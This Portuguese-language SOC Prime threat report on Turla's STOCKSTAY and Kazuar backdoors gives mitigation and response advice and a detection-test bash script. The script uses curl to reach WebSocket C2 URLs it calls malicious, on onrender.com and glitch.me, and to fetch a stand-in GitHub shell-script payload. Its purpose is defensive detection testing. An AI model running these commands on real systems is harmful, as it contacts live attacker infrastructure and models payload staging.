SOC Prime Bias: Crítico

14 Jul 2026 15:35 UTC

Turla (Blizzard Secreto): Backdoors STOCKSTAY e Kazuar Explicados

Author Photo
SOC Prime Team linkedin icon Seguir
Turla (Blizzard Secreto): Backdoors STOCKSTAY e Kazuar Explicados
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Turla é um grupo APT de longa data, alinhado à Rússia, associado ao FSB e conhecido por operações de ciberespionagem contra alvos governamentais e militares. O grupo depende de malwares personalizados, incluindo os backdoors STOCKSTAY e Kazuar, para manter o acesso de longo prazo em ambientes comprometidos. Ele também frequentemente abusa de serviços na nuvem legítimos, como GitHub e Cloudflare, para disfarçar o tráfego de comando e controle.

Investigação

O relatório examina a evolução das ferramentas de malware do Turla, com foco nas famílias STOCKSTAY e Kazuar. Analisa as técnicas de sequestro de infraestrutura do grupo, seu uso de plataformas sem servidor para comando e controle, e sua capacidade de explorar vulnerabilidades, como a de caminho transversal no WinRAR. A investigação também destaca o uso de chaveamento ambiental pelo Turla para reduzir a exposição à análise em sandbox.

Mitigação

As organizações devem implementar monitoramento rigoroso para o uso não autorizado de plataformas web confiáveis, como GitHub e Cloudflare, quando os padrões de tráfego parecerem anormais. A rápida correção de vulnerabilidades como CVE-2025-8088 é essencial para prevenir gravações de arquivos não autorizados. Os defensores também devem ficar atentos à instalação não autorizada de certificados raiz e à execução suspeita de PowerShell ou VBScript que possam indicar atividade do Turla.

Resposta

Se atividade do Turla for detectada, os respondedores devem isolar os hosts afetados e investigar contas de administrador local não autorizadas. Uma revisão detalhada das árvores de processos deve ser realizada para descobrir o carregamento lateral de DLLs envolvendo binários legítimos, como utilitários da NVIDIA ou Brother Printer. A telemetria da rede também deve ser verificada para tráfego incomum de WebSocket, e o armazenamento de confiança da máquina deve ser revisado para alterações suspeitas de certificados.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: A Verificação Prévia de Telemetria e Linha de Base deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar exatamente a telemetria esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos errôneos.

  • Narrativa do Ataque & Comandos: Um adversário estabeleceu com sucesso uma posição e agora está tentando estabelecer comunicação C2. Para evitar detecção, usam uma abordagem “living-off-the-land” ao se conectar a uma plataforma sem servidor hospedada em onrender.com via conexão WebSocket. Simultaneamente, eles tentam puxar uma carga de segunda etapa de um repositório público do GitHub para se misturar com o tráfego de desenvolvedor. A simulação usará curl and wscat (se disponível) ou solicitações web padrão para gerar os padrões de URL específicos definidos na lógica de detecção.

  • Script de Teste de Regressão: [Provide the exact, self-contained, and executable code snippet for the simulation.]

    #!/bin/bash
    # Script de simulação para Validação de Detecção de STOCKSTAY C2
    
    echo "[+] Iniciando Simulação: TTPs do STOCKSTAY C2"
    
    # 1. Disparo: WebSocket C2 via Render (URL Específico)
    echo "[*] Simulando conexão de WebSocket para URL malicioso no Render..."
    curl -k "wss://google-ai-labs-it.onrender.com/ws"
    
    # 2. Disparo: WebSocket C2 via Glitch (URL Específico)
    echo "[*] Simulando conexão de WebSocket para URL malicioso no Glitch..."
    curl -k "wss://wool-basalt-clock.glitch.me/ws"
    
    # 3. Disparo: Estadiamento no GitHub (Correspondência de Domínio Ampla)
    echo "[*] Simulando estadiamento de carga via GitHub..."
    curl -I "https://github.com/malicious-actor/payload-repo/raw/main/shell.sh"
    
    echo "[+] Simulação Completa. Verifique alertas no SIEM."
  • Comandos de Limpeza:

    # Nenhum artefato persistente é criado no host por esta simulação.
    # Garanta que quaisquer arquivos bash temporários sejam removidos, se criados.
    rm -f simulation_stockstay.sh